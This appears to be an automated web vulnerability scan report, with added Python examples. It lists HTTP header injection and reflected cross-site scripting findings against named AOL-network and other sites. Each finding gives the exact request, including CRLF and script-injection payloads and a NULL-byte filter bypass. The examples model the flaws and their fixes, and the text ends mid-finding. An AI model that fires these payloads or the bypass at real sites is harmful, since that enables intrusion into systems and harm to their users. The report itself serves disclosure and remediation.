HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
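The following is an added example, not code from the scan report or from the scanned applications. It models the two header sinks reported below (a cookie value copied into Set-Cookie, a request parameter copied into Location) with a small stand-in renderer, shows how a URL-encoded CRLF in the value splits the header block into extra headers or into a forged body, and then applies the validation rule given above. The hostname example.invalid and the constructed PAYLOAD_SPLIT are assumptions for illustration; the two CRLF payloads are the ones reported on this page.

```python
import re
from urllib.parse import unquote

# Payloads as they appear in the findings on this page: a URL-encoded CRLF
# (%0d%0a) inside a value that the application copies into a response header.
PAYLOAD_COOKIE = "8d2a0%0d%0ab69f5d02509"
PAYLOAD_CODE = "9ef9e%0d%0a865f34c67f4"
# Constructed payload (not from the page): an empty line after the CRLF breaks
# out of the headers, so attacker content becomes the start of the body.
PAYLOAD_SPLIT = "x%0d%0a%0d%0a<html>injected</html>"


def _render(status_line, headers, body):
    """Serialise a response: status line, one header per CRLF line, blank line, body."""
    out = status_line + "\r\n"
    for name, value in headers:
        out += f"{name}: {value}\r\n"
    return (out + "\r\n" + body).encode()


def render_unsafe(status_line, headers, body):
    """Vulnerable pattern: header values are URL-decoded and concatenated into
    the header block with no check. A CR/LF in a value terminates the header
    early, so whatever follows is parsed as a new header line or as the body."""
    return _render(status_line, [(n, unquote(v)) for n, v in headers], body)


def parse_response(raw):
    """Split a raw response the way a browser or proxy does: status line,
    header lines, then everything after the first blank line is the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    return lines[0], lines[1:], body


def injected_header_count(raw_cookie_value):
    """How many extra header lines one Set-Cookie value yields through the unsafe path."""
    _, hdrs, _ = parse_response(
        render_unsafe("HTTP/1.1 200 OK", [("Set-Cookie", "ES=" + raw_cookie_value)], "ok")
    )
    return len(hdrs) - 1


_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
_TOKEN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_header_value(value):
    """Allow-list check for user data destined for a header, following the
    remediation text: decode first, reject any control character (the minimum
    bar), then reject anything that is not a short alphanumeric token."""
    decoded = unquote(value)
    if _CONTROL.search(decoded):
        raise ValueError("control character in header value")
    if not _TOKEN.fullmatch(decoded):
        raise ValueError("header value is not a short alphanumeric token")
    return decoded


def is_safe_header_value(value):
    try:
        validate_header_value(value)
        return True
    except ValueError:
        return False


def safe_redirect(code):
    """Build Location from a constant prefix plus the validated fragment only.
    Only the user-controlled part is validated; the rest of the URL is fixed."""
    location = "http://example.invalid/adscgen/st.php?code=" + validate_header_value(code)
    return _render("HTTP/1.1 302 Found", [("Location", location)], "")


if __name__ == "__main__":
    print(render_unsafe("HTTP/1.1 200 OK", [("Set-Cookie", "ES=" + PAYLOAD_COOKIE)], "ok").decode())
    print(is_safe_header_value(PAYLOAD_CODE), is_safe_header_value("39346973"))
```

The first print shows the Set-Cookie line cut at the CRLF with `b69f5d02509` arriving as a header of its own, which is exactly what the Set-Cookie finding below reports; the validation rejects both CRLF payloads while accepting the plain numeric `code` value from the original request.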
The value of the ES cookie is copied into the Set-Cookie response header. The payload 8d2a0%0d%0ab69f5d02509 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=773969&site=56325597&code=39346973&randnum=3191497 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://golf.fanhouse.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=773969-1-1; ES=8d2a0%0d%0ab69f5d02509
The value of the code request parameter is copied into the Location response header. The payload 9ef9e%0d%0a865f34c67f4 was submitted in the code parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=773969&site=56325597&code=9ef9e%0d%0a865f34c67f4&randnum=3191497 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://golf.fanhouse.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=773969-1-1; ES=773969-v8/mM-0
The value of the site request parameter is copied into the Location response header. The payload 8ffc4%0d%0ade01784bd48 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=773969&site=563255978ffc4%0d%0ade01784bd48&code=39346973&randnum=3191497 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://golf.fanhouse.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=773969-1-1; ES=773969-v8/mM-0
The value of the N cookie is copied into the Set-Cookie response header. The payload 6f0c4%0d%0a0b4bfb73e61 was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js HTTP/1.1
Host: tacoda.at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: JEB2=4D0A45B16E6507448EC1044DF00069F3; ATTAC=a3ZzZWc9OTk5OTk6NjAxMDE=; Anxd=x; Axxd=1; N=2:1b5b3af6671fd812762a203c8d34cbb0,1b5b3af6671fd812762a203c8d34cbb06f0c4%0d%0a0b4bfb73e61; TData=99999|^|#|60101; Tsid=0^1292520884^1292522764|17941^1292520884^1292522764; ANRTT=60101^1^1293125764; CfP=1; AxData=; ATTACID=a3Z0aWQ9MTZna2pkazBwZWtnNXY=;
Response
HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 17:37:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 16 Dec 2010 17:52:29 GMT
Set-Cookie: ANRTT=60101^1^1293125764; path=/; expires=Thu, 23-Dec-10 17:37:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1292520884^1292522764|17941^1292520884^1292522764; path=/; expires=Thu, 16-Dec-10 18:07:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|#|60101; expires=Sun, 11-Dec-11 17:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Thu, 16-Dec-10 23:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:1b5b3af6671fd812762a203c8d34cbb06f0c4
0b4bfb73e61,1b5b3af6671fd812762a203c8d34cbb0; expires=Sun, 11-Dec-11 17:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjAxMDE=; expires=Sun, 11-Dec-11 17:37:29 GMT; path=/; domain=.at.atwola.com
Content-Length: 92
Keep-Alive: timeout=60, max=981
Connection: Keep-Alive
Content-Type: application/x-javascript
var ANUT=1; var ANOO=0; var ANSR=0; var ANTID='16gkjdk0pekg5v'; var ANSL; ANRTXR();
2. Cross-site scripting (reflected)
There are 107 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
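The following is an added example, not code from the scan report or from the scanned sites. It implements both layers described above: allow-list validation that rejects rather than sanitises, and output encoding chosen per context, since the findings below land in two different sinks (an HTML attribute such as the canonical link href, and a double-quoted JavaScript string such as the s_265.prop1 assignment). The two render functions model those sinks with the hostname example.invalid assumed; the payloads are the ones reported on this page.

```python
import re

# Payloads as reported on this page, one per output context.
PAYLOAD_ATTR = '6dcd2"><script>alert(1)</script>c681b57141f=1'
PAYLOAD_JS = 'ab2b3"-alert(1)-"e52d85f10ed'

# Layer 1: strict allow-list validation on arrival. Input that fails is
# rejected, never cleaned up; the patterns follow the examples in the text.
_ALLOW = {
    "name": re.compile(r"[A-Za-z][A-Za-z' .-]{0,63}"),
    "year": re.compile(r"[0-9]{4}"),
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
}


def validate(kind, value):
    """True only if the whole value matches the allow-list for its kind."""
    return _ALLOW[kind].fullmatch(value) is not None


# Layer 2: output encoding for the context the data is written into.
_HTML = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "=": "&#x3D;"}


def html_encode(s):
    """Entity-encode every metacharacter listed in the remediation text (plus &,
    so the output cannot be mis-decoded). Safe for text and quoted attributes."""
    return "".join(_HTML.get(c, c) for c in s)


def _js_escape_char(c):
    cp = ord(c)
    if cp > 0xFFFF:  # outside the BMP: emit a surrogate pair, as JS strings are UTF-16
        cp -= 0x10000
        return "\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF))
    return "\\u%04x" % cp


def js_string_encode(s):
    """Escape for a quoted JavaScript string literal. Everything outside ASCII
    letters and digits becomes a \\uXXXX escape, so the literal cannot be
    terminated, no </script> can close the block, and no HTML metacharacter
    survives even if the script is later inserted into markup."""
    return "".join(c if (c.isascii() and c.isalnum()) else _js_escape_char(c) for c in s)


# Models of the two sinks seen in the findings below.
def canonical_link_unsafe(query):
    return f'<link rel="canonical" href="http://example.invalid/?{query}"/>'


def canonical_link_safe(query):
    return f'<link rel="canonical" href="http://example.invalid/?{html_encode(query)}"/>'


def tracking_script_unsafe(param_name):
    return f'<script>s_265.prop1="{param_name}";</script>'


def tracking_script_safe(param_name):
    return f'<script>s_265.prop1="{js_string_encode(param_name)}";</script>'


if __name__ == "__main__":
    print(canonical_link_unsafe(PAYLOAD_ATTR))
    print(canonical_link_safe(PAYLOAD_ATTR))
    print(tracking_script_unsafe(PAYLOAD_JS))
    print(tracking_script_safe(PAYLOAD_JS))
```

Note that HTML encoding alone is the wrong tool for the script context: `&quot;` inside a `<script>` block is not decoded by the HTML parser, so the string is preserved, but the attribute-style encoding does nothing about `</script>` and line terminators, which is why the JS sink gets its own encoder.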
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22007"%3b65ad075ef7b was submitted in the REST URL parameter 1. This input was echoed as 22007";65ad075ef7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork22007"%3b65ad075ef7b/aol_pp HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.2681801037.1403977984; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Thu, 16 Dec 2010 18:15:55 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10535
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm30 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-lm30.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork22007";65ad075ef7b"; s_265.prop2="aol_pp"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5dc8"%3b9679faf62dc was submitted in the REST URL parameter 1. This input was echoed as f5dc8";9679faf62dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkf5dc8"%3b9679faf62dc/mem_tos HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.4107864397.299958528; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Thu, 16 Dec 2010 18:16:04 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10537
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld29 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ld29.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetworkf5dc8";9679faf62dc"; s_265.prop2="mem_tos"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bd1e"%3b1f8e242ff0e was submitted in the REST URL parameter 1. This input was echoed as 1bd1e";1f8e242ff0e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork1bd1e"%3b1f8e242ff0e/trademarks HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=2334838204.1272580429.3974037760; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Thu, 16 Dec 2010 18:16:14 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10541
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld30 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ld30.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork1bd1e";1f8e242ff0e"; s_265.prop2="trademarks"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72188'><script>alert(1)</script>1e92a6c0f27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/fanhouse72188'><script>alert(1)</script>1e92a6c0f27 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
2.5. http://backporch.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://backporch.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab2b3"-alert(1)-"e52d85f10ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ab2b3"-alert(1)-"e52d85f10ed=1 HTTP/1.1
Host: backporch.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.6. http://backporch.fanhouse.com/2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcd2"><script>alert(1)</script>c681b57141f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/?6dcd2"><script>alert(1)</script>c681b57141f=1 HTTP/1.1
Host: backporch.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://backporch.fanhouse.com/2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/?6dcd2"><script>alert(1)</script>c681b57141f=1"/> ...[SNIP]...
2.7. http://backporch.fanhouse.com/2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d80b"-alert(1)-"cf5e7047a6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/?7d80b"-alert(1)-"cf5e7047a6e=1 HTTP/1.1
Host: backporch.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
var s_code=s_265.t();if(s_code)document.writ ...[SNIP]...
2.8. http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2afe"><script>alert(1)</script>f46a61c40fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/?a2afe"><script>alert(1)</script>f46a61c40fe=1 HTTP/1.1
Host: blog.games.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro ...[SNIP]... <meta property="og:url" content="http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/?a2afe"><script>alert(1)</script>f46a61c40fe=1" /> ...[SNIP]...
2.9. http://boxing.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boxing.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e06fe"-alert(1)-"508b106cf2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e06fe"-alert(1)-"508b106cf2f=1 HTTP/1.1
Host: boxing.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c8833"><script>alert(1)</script>03373126204 was submitted in the REST URL parameter 1. This input was echoed as c8833"><script>alert(1)</script>03373126204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
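The following is an added example, not code from the scan report, the scanned site, or any WAF product. It models the mechanism described in the two paragraphs above: a filter that handles the decoded request as a C string stops reading at the first NUL, while the application drops the NUL and reflects the rest of the path unencoded into an attribute. The filter and application models are assumptions built to reproduce the reported behaviour; the request path is the one from the finding above, and the hostname digg.com is the one in the request.

```python
from html import escape
from urllib.parse import unquote

# Request path from the finding above: a URL-encoded NUL (%00) placed before
# the characters the filter is supposed to block.
PAYLOAD_PATH = '/submit%00c8833"><script>alert(1)</script>03373126204'
BENIGN_PATH = "/submit"
OBVIOUS_PATH = '/submit"><script>alert(1)</script>'


def native_style_filter(raw_path):
    """Models a WAF rule running over a NUL-terminated C string: after URL
    decoding, the rule can only see the bytes before the first NUL, so the
    payload behind it is invisible. Returns True when the request is allowed."""
    decoded = unquote(raw_path)
    visible = decoded.split("\x00", 1)[0]
    return "<script" not in visible.lower()


def app_reflects_unsafe(raw_path):
    """Models the application: it decodes the path, silently drops the NUL
    (which is why the echoed value in the finding carries no %00) and copies
    the result into an attribute without encoding."""
    decoded = unquote(raw_path).replace("\x00", "")
    return f'<link rel="canonical" href="http://digg.com{decoded}"/>'


def app_reflects_fixed(raw_path):
    """The real fix, in the application: encode at the point of output so the
    filter's verdict no longer decides whether a script tag reaches the page."""
    decoded = unquote(raw_path).replace("\x00", "")
    return f'<link rel="canonical" href="http://digg.com{escape(decoded, quote=True)}"/>'


def fixed_filter(raw_path):
    """What a corrected filter does: inspect the whole decoded string, and
    reject a NUL outright because it has no legitimate use in a URL path."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        return False
    return "<script" not in decoded.lower()


def request_outcome(raw_path, filter_fn, app_fn):
    """Run a path through a filter and, if allowed, through the application.
    Returns 'blocked', 'exploited' (script tag reached the page) or 'clean'."""
    if not filter_fn(raw_path):
        return "blocked"
    return "exploited" if "<script>" in app_fn(raw_path) else "clean"


if __name__ == "__main__":
    print(request_outcome(OBVIOUS_PATH, native_style_filter, app_reflects_unsafe))
    print(request_outcome(PAYLOAD_PATH, native_style_filter, app_reflects_unsafe))
    print(request_outcome(PAYLOAD_PATH, fixed_filter, app_reflects_unsafe))
    print(request_outcome(PAYLOAD_PATH, native_style_filter, app_reflects_fixed))
```

The first two lines of output show why the scanner flagged this: the obvious payload is blocked, the same payload behind a NUL gets through and lands in the page. The last line shows that output encoding in the application closes the hole even with the broken filter still in front of it, which is the ordering the remediation text recommends.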
Request
GET /submit%00c8833"><script>alert(1)</script>03373126204 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
2.11. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fantasy.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fbaa"-alert(1)-"98ae8076e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9fbaa"-alert(1)-"98ae8076e1d=1 HTTP/1.1
Host: fantasy.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.12. http://fantasybaseball.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fantasybaseball.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4e07"-alert(1)-"caebf6daf08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
